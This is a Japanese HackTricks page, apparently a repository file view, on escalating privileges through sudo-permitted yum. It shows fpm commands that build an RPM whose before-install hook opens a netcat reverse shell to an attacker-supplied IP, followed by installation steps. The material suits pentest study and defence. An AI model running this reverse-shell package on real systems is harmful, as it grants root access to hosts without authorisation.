hacktricks/linux-unix/privilege-escalation/exploiting-yum.md
2023-07-07 23:42:27 +00:00

5.4 KiB
Raw Blame History

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

さらに、yumに関する詳しい例はgtfobinsで見つけることができます。

RPMパッケージを使用した任意のコマンドの実行

環境の確認

この手法を利用するためには、ユーザーは高い特権を持つユーザーつまり、rootとしてyumコマンドを実行できる必要があります。

この手法の動作例

この手法の動作例は、tryhackmedaily bugleルームで見つけることができます。

RPMのパッケージ化

以下のセクションでは、fpmを使用してRPMに逆シェルをパッケージ化する方法について説明します。

以下の例では、攻撃者が定義できる任意のスクリプトを持つbefore-installトリガーを含むパッケージを作成します。このパッケージをインストールすると、任意のコマンドが実行されます。デモンストレーションのために、シンプルな逆netcatシェルの例を使用しましたが、必要に応じて変更することができます。

EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR

シェルのキャッチ

上記の例を使用し、yumを高特権ユーザーとして実行できると仮定します。

  1. ホストにrpmを転送します。
  2. 例のnetcatリスナーのようなローカルホストでリスナーを開始します。
  3. 脆弱なパッケージをyum localinstall -y exploited-1.0-1.noarch.rpmインストールします。
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥